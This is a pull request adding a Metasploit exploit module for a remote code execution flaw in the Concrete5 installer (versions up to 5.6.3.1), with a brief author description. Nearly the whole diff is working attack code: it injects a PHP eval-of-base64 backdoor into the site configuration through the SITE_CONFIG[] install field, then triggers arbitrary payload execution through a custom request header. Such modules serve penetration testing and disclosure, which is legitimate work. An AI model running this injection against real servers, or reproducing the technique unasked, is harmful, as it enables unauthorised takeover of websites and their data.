### PR TITLE
Add Concrete5 <= 5.6.3.1 (install.php) RCE for linux

### DIFF
--- a/modules/exploits/unix/webapp/concrete5_install_exec.rb
+++ b/modules/exploits/unix/webapp/concrete5_install_exec.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Concrete5 <= 5.6.3.1 (install.php) Remote Code Execution Exploitation',
+      'Description'    => %q{
+        This module exploits a installation processes of Concrete5. 
+        Exploit wont work  if concrete5 install has already been installed.
+        This modules exploits configure() method of installation class. That method is writing configuration defination
+        into the file.
+      },
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>', # Vulnerability Author and Exploit Development
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [          
+          [ 'URL', 'http://www.mehmetince.net/concrete5-remote-code-execution-vulnerability-exploitation/' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        => [ ['Concrete5 <= 5.6.3.1', { }], ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 5 2014'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The Path", "/"]),
+          OptString.new('DB_SERVER', [ true, "MySQL server address"]),
+          OptString.new('DB_USERNAME', [ true, "MySQL username"]),
+          OptString.new('DB_PASSWORD', [ true, "MySQL password"]),
+          OptString.new('DB_DATABASE', [ true, "MySQL name of database", "concrete5"]),
+
+        ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s, "index.php/install/-/configure/"),
+      'method'  => 'GET'
+    })
+    if res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Testing Exploit")
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable.Maybe Concrete5 has already been installed")
+    end
+    print_status("#{peer} - Triggering Vulnerability")
+    res = send_request_cgi({
+          'uri'     =>  normalize_uri(target_uri.path.to_s, "index.php/install/-/configure/"),
+          'method'  =>  'POST',
+          'vars_post'=>  {
+            'locale'      => '',
+            'SITE'        => 'Concrete 5 -Test',
+            'uEmail'      => 'test@yopmail.com',
+            'uPassword'   => '0p3ns0urc3',
+            'uPasswordConfirm'  =>  '0p3ns0urc3',
+            'DB_SERVER'         =>  @datastore['DB_SERVER'],
+            'DB_USERNAME'       =>  @datastore['DB_USERNAME'],
+            'DB_PASSWORD'       =>  @datastore['DB_PASSWORD'],
+            'DB_DATABASE'       =>  @datastore['DB_DATABASE'],
+            'SAMPLE_CONTENT'    =>  'standard',
+            'SITE_CONFIG[]'     =>  "SITE_CONFIG[]=');error_reporting(0);eval(base64_decode($_SERVER[HTTP_RCE]));$f=array('"
+          }
+        })
+    # If webpage returns error, it highly possible with wrong DBS credentials
+    if ( res.body =~ /<div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×<\/button>/ )
+      print_error("#{peer} -  Please check out DB credentials. Also be sure remote connection is available!")
+    end
+
+    # Installation must be start now. Call injected php file to code execution
+    # site_install.php is temp file. It will rename to site.php after installation done.
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path.to_s, "config/site_install.php"),
+      'headers'   => {
+        'Rce' => Rex::Text.encode_base64(payload.encoded)
+      }
+    })
+
+    if res
+      print_error("#{peer} - Payload execution failed: #{res.code}")
+      return
+    end
+  end
+end


### PR DESCRIPTION
I found RCE vulnerability on Concrete5 and developed metasploit module. Full analyses write-up can be found at following link : http://www.mehmetince.net/concrete5-remote-code-execution-vulnerability-exploitation/
